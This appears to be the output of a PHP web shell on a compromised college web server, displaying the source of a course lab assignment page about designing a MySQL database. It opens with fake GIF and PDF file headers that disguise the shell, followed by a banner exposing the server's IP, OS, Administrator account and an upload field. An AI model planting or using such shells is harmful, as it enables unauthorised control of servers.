GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/_Archive/MMDT1145/_Archive/ |
Upload File : |
<? // JimMartinson/MMDT1145/Lab04.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); include('Course/courseInfo.phpinc'); include('classInfo.phpinc'); $assignmentNumber = 4; $assignmentType = "Lab"; $assignmentTitle = "Project Database Design"; $evaluationType = "Lab"; if (!isset($evaluationNumber)) { $evaluationNumber = $assignmentNumber; } if (!isset($evaluationTitle)) { $evaluationTitle = $assignmentTitle; } if (strlen($assignmentNumber) == 1) { $assignmentName = $assignmentType."0".$assignmentNumber; $evaluationName = $evaluationType."0".$evaluationNumber; } else { $assignmentName = $assignmentType.$assignmentNumber; $evaluationName = $evaluationType.$assignmentNumber; } $title = $evaluationType." ".$evaluationNumber.": ".$evaluationTitle; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title; $pageMenu = 'Course/courseMenu.phpinc'; $smallTitle = true; include('common/pageHeader.phpinc'); $sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title; include('common/sectionHeader.phpinc'); $userFullName = str_replace(" ","",$_SESSION['userFullName']); ?> <p> <fieldset><legend><?=$evaluationType?> Assignment</legend> Design the database for the Iven project. The database name is <b>iven</b>. Create the database using MySQL tools such as MySQL Administrator, MySQL Workbench, or SQLyog.<br> Export your database design using MySQL Administrator's Backup feature.<br> Zip it up into a file called <b class="nobr"><?=$userFullName?>-<?=$courseNumber?>-<?=$evaluationName?>.zip</b> <br> Send an email to <a href="mailto:jim.martinson@ridgewater.edu?subject=<?=$courseNumber?> - <?=$evaluationName?> Submission">jim.martinson@ridgewater.edu</a> with a subject of <b><?=$courseNumber?> - <?=$evaluationName?> Submission</b> and attach your <b class="nobr"><?=$userFullName?>-<?=$courseNumber?>-<?=$evaluationName?>.zip</b> file. <br> This assignment is due <?=classDueDate($class['meetingTime'][0],$class['StartDate'][0],5)?>. </fieldset> <fieldset><legend>Grading Criteria</legend> Demonstrated assignment effectively: 10 points. <br /> There are some things I expect. If they are incorrect you will lose the following: <br /> Incorrect attachment file name: -1 pt. <br /> Work submitted incorrectly: -1pt. <br /> Incorrect subject in email: -1pt. <br /> Second and subsequent submission of work for grading: -1pt. <br /> wWork submitted late: -1pt per week. </fieldset> <? include('ReferencesResources.phpinc'); include('common/sectionFooter.phpinc'); include('common/pageFooter.phpinc'); ?>